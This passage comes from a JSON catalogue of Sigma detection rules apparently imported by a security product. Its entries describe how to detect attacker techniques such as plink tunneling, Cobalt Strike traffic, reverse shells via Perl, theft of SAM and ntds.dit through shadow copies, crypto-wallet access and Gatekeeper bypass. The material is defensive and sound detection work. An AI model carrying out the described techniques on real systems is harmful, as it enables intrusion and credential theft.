"df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml" } }, { "id": "sigmahq-sigma-f38a82d2-fba3-4781-b549-525efbec8506", "type": "detection", "name": "PUA - 3Proxy Execution", "description": "Detects the use of 3proxy, a tiny free proxy server", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1572" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-3proxy-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f38a82d2-fba3-4781-b549-525efbec8506", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_3proxy_execution.yml" } }, { "id": "sigmahq-sigma-f38ce0b9-5e97-4b47-a211-7dc8d8b871da", "type": "detection", "name": "Potential RDP Tunneling Via Plink", "description": "Execution of plink to perform data exfiltration and tunneling", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1572" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-rdp-tunneling-via-plink.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_plink_susp_tunneling.yml" } }, { "id": "sigmahq-sigma-f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", "type": "detection", "name": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module", "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-var-launcher-obfuscation-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_var.yml" } }, { "id": "sigmahq-sigma-f3d39c45-de1a-4486-a687-ab126124f744", "type": "detection", "name": "Sdiagnhost Calling Suspicious Child Process", "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036", "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sdiagnhost-calling-suspicious-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f3d39c45-de1a-4486-a687-ab126124f744", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sdiagnhost_susp_child.yml" } }, { "id": "sigmahq-sigma-f3f21ce1-cdef-4bfc-8328-ed2e826f5fac", "type": "detection", "name": "HackTool - CobaltStrike Malleable Profile Patterns - Proxy", "description": "Detects cobalt strike malleable profiles patterns (URI, User-Agents, Methods).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-cobaltstrike-malleable-profile-patterns-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f3f21ce1-cdef-4bfc-8328-ed2e826f5fac", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_hktl_cobalt_strike_malleable_c2_requests.yml" } }, { "id": "sigmahq-sigma-f40017b3-cb2e-4335-ab5d-3babf679c1de", "type": "detection", "name": "Remote DLL Load Via Rundll32.EXE", "description": "Detects a remote DLL load event via \"rundll32.exe\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-dll-load-via-rundll32-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f40017b3-cb2e-4335-ab5d-3babf679c1de", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_rundll32_remote_share_load.yml" } }, { "id": "sigmahq-sigma-f41b0311-44f9-44f0-816d-dd45e39d4bc8", "type": "detection", "name": "Access To Crypto Currency Wallets By Uncommon Applications", "description": "Detects file access requests to crypto currency files by uncommon processes.\nCould indicate potential attempt of crypto currency wallet stealing.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/access-to-crypto-currency-wallets-by-uncommon-applications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f41b0311-44f9-44f0-816d-dd45e39d4bc8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_access/file_access_win_susp_crypto_currency_wallets.yml" } }, { "id": "sigmahq-sigma-f41dada5-3f56-4232-8503-3fb7f9cf2d60", "type": "detection", "name": "ESXi Storage Information Discovery Via ESXCLI", "description": "Detects execution of the \"esxcli\" command with the \"storage\" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033", "T1007", "T1059.012" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/esxi-storage-information-discovery-via-esxcli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f41dada5-3f56-4232-8503-3fb7f9cf2d60", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_esxcli_storage_discovery.yml" } }, { "id": "sigmahq-sigma-f4264e47-f522-4c38-a420-04525d5b880f", "type": "detection", "name": "Renamed AutoIt Execution", "description": "Detects the execution of a renamed AutoIt2.exe or AutoIt3.exe.\nAutoIt is a scripting language and automation tool for Windows systems. While primarily used for legitimate automation tasks, it can be misused in cyber attacks.\nAttackers can leverage AutoIt to create and distribute malware, including keyloggers, spyware, and botnets. A renamed AutoIt executable is particularly suspicious.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-autoit-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f4264e47-f522-4c38-a420-04525d5b880f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_autoit.yml" } }, { "id": "sigmahq-sigma-f426547a-e0f7-441a-b63e-854ac5bdf54d", "type": "detection", "name": "Perl Inline Command Execution", "description": "Detects execution of perl using the \"-e\"/\"-E\" flags. This is could be used as a way to launch a reverse shell or execute live perl code.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/perl-inline-command-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f426547a-e0f7-441a-b63e-854ac5bdf54d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_perl_inline_command_execution.yml" } }, { "id": "sigmahq-sigma-f43f5d2f-3f2a-4cc8-b1af-81fde7dbaf0e", "type": "detection", "name": "AWS Suspicious SAML Activity", "description": "Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078", "T1548", "T1550", "T1550.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-suspicious-saml-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f43f5d2f-3f2a-4cc8-b1af-81fde7dbaf0e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_susp_saml_activity.yml" } }, { "id": "sigmahq-sigma-f44800ac-38ec-471f-936e-3fa7d9c53100", "type": "detection", "name": "PUA - CleanWipe Execution", "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-cleanwipe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f44800ac-38ec-471f-936e-3fa7d9c53100", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_cleanwipe.yml" } }, { "id": "sigmahq-sigma-f459ccb4-9805-41ea-b5b2-55e279e2424a", "type": "detection", "name": "Remote Access Tool - Team Viewer Session Started On MacOS Host", "description": "Detects the command line executed when TeamViewer starts a session started by a remote host.\nOnce a connection has been started, an investigator can verify the connection details by viewing the \"incoming_connections.txt\" log file in the TeamViewer folder.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-team-viewer-session-started-on-macos-host.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f459ccb4-9805-41ea-b5b2-55e279e2424a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_remote_access_tools_teamviewer_incoming_connection.yml" } }, { "id": "sigmahq-sigma-f4a623c2-4ef5-4c33-b811-0642f702c9f1", "type": "detection", "name": "Visual Studio Code Tunnel Shell Execution", "description": "Detects the execution of a shell (powershell, bash, wsl...) via Visual Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel and execute arbitrary commands on the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/visual-studio-code-tunnel-shell-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f4a623c2-4ef5-4c33-b811-0642f702c9f1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_vscode_tunnel_remote_shell_.yml" } }, { "id": "sigmahq-sigma-f4bbd493-b796-416e-bbf2-121235348529", "type": "detection", "name": "Non Interactive PowerShell Process Spawned", "description": "Detects non-interactive PowerShell activity by looking at the \"powershell\" process with a non-user GUI process such as \"explorer.exe\" as a parent.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/non-interactive-powershell-process-spawned.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f4bbd493-b796-416e-bbf2-121235348529", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_non_interactive_execution.yml" } }, { "id": "sigmahq-sigma-f4d3748a-65d1-4806-bd23-e25728081d01", "type": "detection", "name": "Network Sniffing - Linux", "description": "Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1040" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/network-sniffing-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f4d3748a-65d1-4806-bd23-e25728081d01", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_network_sniffing.yml" } }, { "id": "sigmahq-sigma-f4ff7323-b5fc-4323-8b52-6b9408e15788", "type": "detection", "name": "Potential PowerShell Console History Access Attempt via History File", "description": "Detects potential access attempts to the PowerShell console history directly via history file (ConsoleHost_history.txt).\nThis can give access to plaintext passwords used in PowerShell commands or used for general reconnaissance.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-powershell-console-history-access-attempt-via-history-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f4ff7323-b5fc-4323-8b52-6b9408e15788", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_console_history_file_access.yml" } }, { "id": "sigmahq-sigma-f50f3c09-557d-492d-81db-9064a8d4e211", "type": "detection", "name": "Suspicious Execution Of Renamed Sysinternals Tools - Registry", "description": "Detects the creation of the \"accepteula\" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1588.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-execution-of-renamed-sysinternals-tools-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f50f3c09-557d-492d-81db-9064a8d4e211", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula.yml" } }, { "id": "sigmahq-sigma-f512acbf-e662-4903-843e-97ce4652b740", "type": "detection", "name": "Volume Shadow Copy Mount", "description": "Detects volume shadow copy mount via Windows event log", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1003.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/volume-shadow-copy-mount.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f512acbf-e662-4903-843e-97ce4652b740", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/microsoft_windows_ntfs/win_system_volume_shadow_copy_mount.yml" } }, { "id": "sigmahq-sigma-f5141b6d-9f42-41c6-a7bf-2a780678b29b", "type": "detection", "name": "Gatekeeper Bypass via Xattr", "description": "Detects macOS Gatekeeper bypass via xattr utility", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1553.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/gatekeeper-bypass-via-xattr.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f5141b6d-9f42-41c6-a7bf-2a780678b29b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_xattr_gatekeeper_bypass.yml" } }, { "id": "sigmahq-sigma-f5240972-3938-4e56-8e4b-e33893176c1f", "type": "detection", "name": "Suspicious Query of MachineGUID", "description": "Use of reg to get MachineGuid information", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-query-of-machineguid.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f5240972-3938-4e56-8e4b-e33893176c1f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_machineguid.yml" } }, { "id": "sigmahq-sigma-f53714ec-5077-420e-ad20-907ff9bb2958", "type": "detection", "name": "Forfiles.EXE Child Process Masquerading", "description": "Detects the execution of \"forfiles\" from a non-default location, in order to potentially spawn a custom \"cmd.exe\" from the current working directory.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/forfiles-exe-child-process-masquerading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f53714ec-5077-420e-ad20-907ff9bb2958", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_forfiles_child_process_masquerading.yml" } }, { "id": "sigmahq-sigma-f548a603-c9f2-4c89-b511-b089f7e94549", "type": "detection", "name": "Potential Persistence Via Microsoft Compatibility Appraiser", "description": "Detects manual execution of the \"Microsoft Compatibility Appraiser\" task via schtasks.\nIn order to trigger persistence stored in the \"\\AppCompatFlags\\TelemetryController\" registry key.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-microsoft-compatibility-appraiser.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f548a603-c9f2-4c89-b511-b089f7e94549", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_persistence_windows_telemetry.yml" } }, { "id": "sigmahq-sigma-f576a613-2392-4067-9d1a-9345fb58d8d1", "type": "detection", "name": "Automated Collection Command Prompt", "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1119", "T1552.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/automated-collection-command-prompt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f576a613-2392-4067-9d1a-9345fb58d8d1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_automated_collection.yml" } }, { "id": "sigmahq-sigma-f57c58b3-ee69-4ef5-9041-455bf39aaa89", "type": "detection", "name": "Remote CHM File Download/Execution Via HH.EXE", "description": "Detects the usage of \"hh.exe\" to execute/download remotely hosted \".chm\" files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-chm-file-download-execution-via-hh-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f57c58b3-ee69-4ef5-9041-455bf39aaa89", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hh_chm_remote_download_or_execution.yml" } }, { "id": "sigmahq-sigma-f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", "type": "detection", "name": "Sensitive File Access Via Volume Shadow Copy Backup", "description": "Detects a command that accesses the VolumeShadowCopy in order to extract sensitive files such as the Security or SAM registry hives or the AD database (ntds.dit)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sensitive-file-access-via-volume-shadow-copy-backup.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_sensitive_file_access_shadowcopy.yml" } }, { "id": "sigmahq-sigma-f598ea0c-c25a-4f72-a219-50c44411c791", "type": "detection", "name": "Possible Shadow Credentials Added", "description": "Detects possible addition of shadow credentials to an active directory object.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/possible-shadow-credentials-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f598ea0c-c25a-4f72-a219-50c44411c791", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_possible_shadow_credentials_added.yml" } }, { "id": "sigmahq-sigma-f59c3faf-50f3-464b-9f4c-1b67ab512d99", "type": "detection", "name": "Common Autorun Keys Modification", "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/common-autorun-keys-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f59c3faf-50f3-464b-9f4c-1b67ab512d99", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml" } }, { "id": "sigmahq-sigma-f5d19838-41b5-476c-98d8-ba8af4929ee2", "type": "detection", "name": "LOL-Binary Copied From System Directory", "description": "Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/lol-binary-copied-from-system-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f5d19838-41b5-476c-98d8-ba8af4929ee2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_copy_system_dir_lolbin.yml" } }, { "id": "sigmahq-sigma-f5d1def8-1de0-4a0e-9794-1f6f27dd605c", "type": "detection", "name": "PowerShell Hotfix Enumeration", "description": "Detects call to \"Win32_QuickFixEngineering\" in order to enumerate installed hotfixes often used in \"enum\" scripts by attackers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-hotfix-enumeration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f5d1def8-1de0-4a0e-9794-1f6f27dd605c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_hotfix_enum.yml" } }, { "id": "sigmahq-sigma-f5e3b62f-e577-4e59-931e-0a15b2b94e1e", "type": "detection", "name": 